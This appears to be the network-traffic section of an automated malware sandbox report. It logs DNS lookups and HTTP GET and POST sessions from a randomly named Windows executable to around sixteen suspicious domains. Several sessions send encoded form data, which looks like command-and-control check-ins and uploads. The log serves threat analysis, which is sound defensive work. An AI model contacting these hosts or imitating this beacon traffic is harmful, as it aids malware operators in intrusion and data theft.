                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 21, 2024 16:57:00.503331900 CET192.168.2.41.1.1.10x9598Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:17.479674101 CET192.168.2.41.1.1.10x264Standard query (0)www.70kdd.topA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:32.419053078 CET192.168.2.41.1.1.10xb71bStandard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:46.917448044 CET192.168.2.41.1.1.10x3a9Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:01.870594025 CET192.168.2.41.1.1.10xabd6Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:16.528772116 CET192.168.2.41.1.1.10x29a4Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:31.668128014 CET192.168.2.41.1.1.10xe6a6Standard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:47.652833939 CET192.168.2.41.1.1.10x52c3Standard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:02.777365923 CET192.168.2.41.1.1.10x7e7dStandard query (0)www.ampsamkok88.shopA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:17.280776978 CET192.168.2.41.1.1.10xd132Standard query (0)www.gogawithme.liveA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:32.136663914 CET192.168.2.41.1.1.10x1993Standard query (0)www.54248711.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:46.933824062 CET192.168.2.41.1.1.10xe198Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:01.576854944 CET192.168.2.41.1.1.10x9269Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:16.168498993 CET192.168.2.41.1.1.10x66d6Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:30.887017012 CET192.168.2.41.1.1.10x203aStandard query (0)www.3kw40881107247y.clickA (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:45.980561972 CET192.168.2.41.1.1.10xa882Standard query (0)www.7261ltajbc.bondA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 21, 2024 16:57:00.641122103 CET1.1.1.1192.168.2.40x9598No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:00.641122103 CET1.1.1.1192.168.2.40x9598No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:17.707570076 CET1.1.1.1192.168.2.40x264No error (0)www.70kdd.top70kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:17.707570076 CET1.1.1.1192.168.2.40x264No error (0)70kdd.top38.47.232.124A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:32.558857918 CET1.1.1.1192.168.2.40xb71bNo error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:47.055114031 CET1.1.1.1192.168.2.40x3a9No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:57:47.055114031 CET1.1.1.1192.168.2.40x3a9No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:02.011957884 CET1.1.1.1192.168.2.40xabd6No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:02.011957884 CET1.1.1.1192.168.2.40xabd6No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:16.917889118 CET1.1.1.1192.168.2.40x29a4No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:31.806478024 CET1.1.1.1192.168.2.40xe6a6No error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:58:48.054840088 CET1.1.1.1192.168.2.40x52c3No error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:02.923151016 CET1.1.1.1192.168.2.40x7e7dNo error (0)www.ampsamkok88.shop172.67.209.48A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:02.923151016 CET1.1.1.1192.168.2.40x7e7dNo error (0)www.ampsamkok88.shop104.21.15.243A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:17.600111961 CET1.1.1.1192.168.2.40xd132No error (0)www.gogawithme.live209.74.77.109A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:32.480237007 CET1.1.1.1192.168.2.40x1993No error (0)www.54248711.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 16:59:47.071213961 CET1.1.1.1192.168.2.40xe198No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:01.722011089 CET1.1.1.1192.168.2.40x9269No error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:01.722011089 CET1.1.1.1192.168.2.40x9269No error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:16.471065998 CET1.1.1.1192.168.2.40x66d6No error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:16.471065998 CET1.1.1.1192.168.2.40x66d6No error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:31.224958897 CET1.1.1.1192.168.2.40x203aNo error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:31.224958897 CET1.1.1.1192.168.2.40x203aNo error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false
                                                                                                                    Nov 21, 2024 17:00:46.909383059 CET1.1.1.1192.168.2.40xa882No error (0)www.7261ltajbc.bond154.12.28.184A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.rtpterbaruwaktu3.xyz
                                                                                                                    • www.70kdd.top
                                                                                                                    • www.acond-22-mvr.click
                                                                                                                    • www.smartcongress.net
                                                                                                                    • www.mrpokrovskii.pro
                                                                                                                    • www.ytsd88.top
                                                                                                                    • www.matteicapital.online
                                                                                                                    • www.llljjjiii.shop
                                                                                                                    • www.ampsamkok88.shop
                                                                                                                    • www.gogawithme.live
                                                                                                                    • www.54248711.xyz
                                                                                                                    • www.canadavinreport.site
                                                                                                                    • www.questmatch.pro
                                                                                                                    • www.bser101pp.buzz
                                                                                                                    • www.3kw40881107247y.click

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449736103.21.221.87803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:00.777770042 CET354OUTGET /7yx4/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=m5A4fx9ZIvMjycGTXvyw9uJmE8MC06yi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQczXh8T6WPeXIwty/TEDOHxdjdmbI+7yKQjQ= HTTP/1.1
                                                                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:57:02.433334112 CET1033INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 796
                                                                                                                    date: Thu, 21 Nov 2024 15:57:02 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.44973738.47.232.124803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:17.845588923 CET595OUTPOST /klhq/ HTTP/1.1
                                                                                                                    Host: www.70kdd.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.70kdd.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.70kdd.top/klhq/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 6f 38 4e 78 71 4c 61 46 34 45 7a 6b 72 57 6f 71 66 44 43 71 77 4a 7a 44 46 4b 6d 39 67 43 78 51 41 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2co8NxqLaF4EzkrWoqfDCqwJzDFKm9gCxQA==
                                                                                                                    Nov 21, 2024 16:57:19.430352926 CET312INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:57:19 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 148
                                                                                                                    Connection: close
                                                                                                                    ETag: "66e01838-94"
                                                                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.44973838.47.232.124803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:20.503700018 CET615OUTPOST /klhq/ HTTP/1.1
                                                                                                                    Host: www.70kdd.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.70kdd.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.70kdd.top/klhq/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 77 56 54 6b 33 4d 31 6f 39 46 36 34 34 75 4b 6a 33 31 46 31 65 46 7a 54 6e 62 6d 7a 44 6d 68 42 32 70 63 6f 78 75 47 38 49 55 69 4e 33 65 72 33 78 6a 37 5a 34 68 30 34 77 55 39 4b 44 67 30 42 43 65 32 74 38 53 41 30 50 63 4a 32 41 6d 31 56 68 66 35 65 67 65 39 6f 36 61 38 41 5a 36 62 70 46 69 7a 55 34 4b 69 4d 42 37 2b 6e 74 51 49 47 71 58 47 76 4a 74 52 35 31 79 32 70 37 30 59 70 38 53 73 4e 62 79 37 75 69 56 34 77 74 41 65 43 44 53 77 6a 2f 34 4c 46 37 63 74 63 44 4b 39 74 73 33 6d 32 59 38 54 30 65 79 4d 68 59 3d
                                                                                                                    Data Ascii: GzeXFT7=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wtAeCDSwj/4LF7ctcDK9ts3m2Y8T0eyMhY=
                                                                                                                    Nov 21, 2024 16:57:22.023571014 CET312INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:57:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 148
                                                                                                                    Connection: close
                                                                                                                    ETag: "66e01838-94"
                                                                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.44973938.47.232.124803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:23.170151949 CET10697OUTPOST /klhq/ HTTP/1.1
                                                                                                                    Host: www.70kdd.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.70kdd.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.70kdd.top/klhq/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 59 53 70 73 6d 79 75 39 4f 64 71 79 6c 39 4b 6a 2f 45 39 53 66 68 56 48 43 6f 70 74 6e 74 72 4f 63 47 72 56 74 78 4f 6d 53 55 5a 6b 78 46 76 2f 76 33 64 4a 4b 46 34 70 77 49 48 4b 33 6a 48 66 6c 44 4e 31 38 6d 72 52 53 48 61 77 38 66 4f 42 77 68 6a 6c 6f 31 57 6f 39 4d 4e 56 56 44 76 47 33 39 50 53 41 7a 45 54 55 38 76 44 36 62 5a 34 54 74 66 4a 45 45 6c 79 4a 45 50 43 64 32 73 79 34 48 55 57 43 69 6f 2f 43 4c 66 51 33 76 39 71 73 49 6e 4b 56 2f 45 54 73 36 57 4b 75 37 2f 30 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+4VTRrM6rFF944uUz30F1eYzT/XmzP2hEypdL5uPtIUsN3egXxglp5p04gQ9KTg0BCe2vUSJAbcGWAh81hD9eg29rLv8AtqbdJizwUKxKV78Hs2LGqPGu1IR9cB2p/eYpYSpsmyu9Odqyl9Kj/E9SfhVHCoptntrOcGrVtxOmSUZkxFv/v3dJKF4pwIHK3jHflDN18mrRSHaw8fOBwhjlo1Wo9MNVVDvG39PSAzETU8vD6bZ4TtfJEElyJEPCd2sy4HUWCio/CLfQ3v9qsInKV/ETs6WKu7/0s4w8iVAeIOf/DoRx8V6koJlOGd+W1GKwQ6yKV4nomQ7dC7gRXBJANNbV3zxbWQvTUSpzn9m0wXWkfftITGu7ACSXTOm5QFoyrX9/LkXSoTgncpGJgrJlabiboJLsvpOiVgGhA+hpkUkz2DllN/9fRWAw+OjcW+jr9L5yz80TvVkSS2JFfl3lP7U6xiF3j0N9qQSJTqACupxN28jKfUyUEIMoOSahXaY2RiOroqt7CYOlRstYkWPlIc9RxIytx+FKxzWb+Thsf/S+t8rkuKDQLNgRKG9hPyavE/yuQFfBO8SKLHdoQZsd06+abs64A526RM5HvYI1a1aeNwfurjJsV29eSsVNWPUBCrrCKzZOfl0kicHV6mCaaVDMnXWCMVESfUUjxRnlRRyfKacff2AA3kUNrjbq5/Bl1N9GgA2+z/a/bgRpA0uL3V5xB9EQk9NsE6NzIIT41w42s4H9UkMqUqgtbi//Hkjz4gEkNdsWMC3Rda/juPobeEaYTMLqUhTFpPqxCeqNiTi0Trtcg7bzRPHRsAM3CtYAu2tWahootqGOfSPqOK5ZZj+EvHSj6xYzbmnW4GKC4ndUe/qgXBHcAH9SF1OXZ8kfchXhU4jkn6s7mb3bdwUMyJYLcYE5vP5za8U8Jgi5+KUplhUy6Q0v0dopSINEYMzZXf [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44974038.47.232.124803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:25.829682112 CET343OUTGET /klhq/?GzeXFT7=AHY/rhT5FAaHaOQvyjmolPV0Gci6vpbrO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+kcDBiU8NkZcujbIB4aDN0RaZvptmL2rjFAE=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.70kdd.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:57:27.409806013 CET312INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:57:27 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 148
                                                                                                                    Connection: close
                                                                                                                    ETag: "66e01838-94"
                                                                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449742199.59.243.227803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:32.729197025 CET622OUTPOST /w9z4/ HTTP/1.1
                                                                                                                    Host: www.acond-22-mvr.click
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.acond-22-mvr.click
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 55 2f 6f 62 54 59 45 72 4d 61 32 75 78 4f 6e 71 2b 43 4d 55 56 64 43 4d 2b 5a 6d 4e 76 64 44 2b 31 44 74 54 45 56 64 62 2f 72 46 41 79 55 32 55 38 62 30 33 46 2b 4a 52 77 70 47 49 54 42 38 38 53 46 46 42 34 4d 62 52 38 6d 6c 4d 51 61 53 44 4f 5a 51 50 52 4e 77 59 54 65 4a 42 7a 39 36 73 31 76 39 61 67 67 65 57 75 34 4b 31 5a 66 51 6c 37 34 45 54 45 35 71 36 72 54 36 68 73 44 53 30 6c 79 2b 72 4a 7a 79 61 39 41 43 4d 50 36 4a 68 6e 69 47 55 6d 70 43 66 4e 33 66 75 55 4d 56 61 53 65 65 2b 51 39 54 69 63 69 34 79 32 30 66 46 79 62 73 46 77 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGUmpCfN3fuUMVaSee+Q9Tici4y20fFybsFw==
                                                                                                                    Nov 21, 2024 16:57:33.850008011 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Thu, 21 Nov 2024 15:57:33 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1138
                                                                                                                    x-request-id: 5885bcc2-bea2-4929-85ef-a0d038ca684c
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                    set-cookie: parking_session=5885bcc2-bea2-4929-85ef-a0d038ca684c; expires=Thu, 21 Nov 2024 16:12:33 GMT; path=/
                                                                                                                    connection: close
